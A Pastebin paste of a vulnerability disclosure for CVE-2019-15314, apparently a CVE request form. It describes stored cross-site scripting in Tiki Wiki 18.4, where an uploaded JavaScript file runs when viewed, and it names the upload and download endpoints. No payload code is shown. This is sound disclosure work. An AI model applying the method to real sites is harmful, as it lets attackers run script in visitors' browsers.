Guest User

CVE-2019-15314

a guest
Aug 22nd, 2019
751
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. CVE-2019-15314
  2.  
  3. > [Description]
  4. > tiki/tiki-upload_file.php in Tiki 18.4 allows remote attackers to
  5. > upload JavaScript code that is executed upon visiting a
  6. > tiki/tiki-download_file.php?display&fileId= URI.
  7. >
  8. > ------------------------------------------
  9. >
  10. > [Additional Information]
  11. > File upload and JavaScript code injection.
  12. > http://127.0.0.1/tiki/tiki-upload_file.php
  13. >
  14. > The TikiWiki CMS application allows you to upload a JavaScript file in the "File Upload" module.
  15. > When viewing the uploaded file, the JavaScript code runs in the client browser.
  16. >
  17. > The injected JavaScript code is stored by the application and executed every time someone views it.
  18. > ["Browser display (Raw / Download)"]
  19. > http://127.0.0.1/tiki/tiki-download_file.php?fileId=17&display
  20. >
  21. > ------------------------------------------
  22. >
  23. > [Vulnerability Type]
  24. > Cross Site Scripting (XSS)
  25. >
  26. > ------------------------------------------
  27. >
  28. > [Vendor of Product]
  29. > https://tiki.org/HomePage
  30. >
  31. > ------------------------------------------
  32. >
  33. > [Affected Product Code Base]
  34. > Tiki Wiki CMS - 18.4
  35. >
  36. > ------------------------------------------
  37. >
  38. > [Affected Component]
  39. > Affected component: tiki-upload_file.php
  40. >
  41. > ------------------------------------------
  42. >
  43. > [Attack Type]
  44. > Remote
  45. >
  46. > ------------------------------------------
  47. >
  48. > [Impact Code execution]
  49. > true
  50. >
  51. > ------------------------------------------
  52. >
  53. > [Attack Vectors]
  54. > Client side JavaScript code injection.
  55. >
  56. > ------------------------------------------
  57. >
  58. > [Reference]
  59. > https://tiki.org/HomePage
  60.  
  61. Use CVE-2019-15314.
RAW Paste Data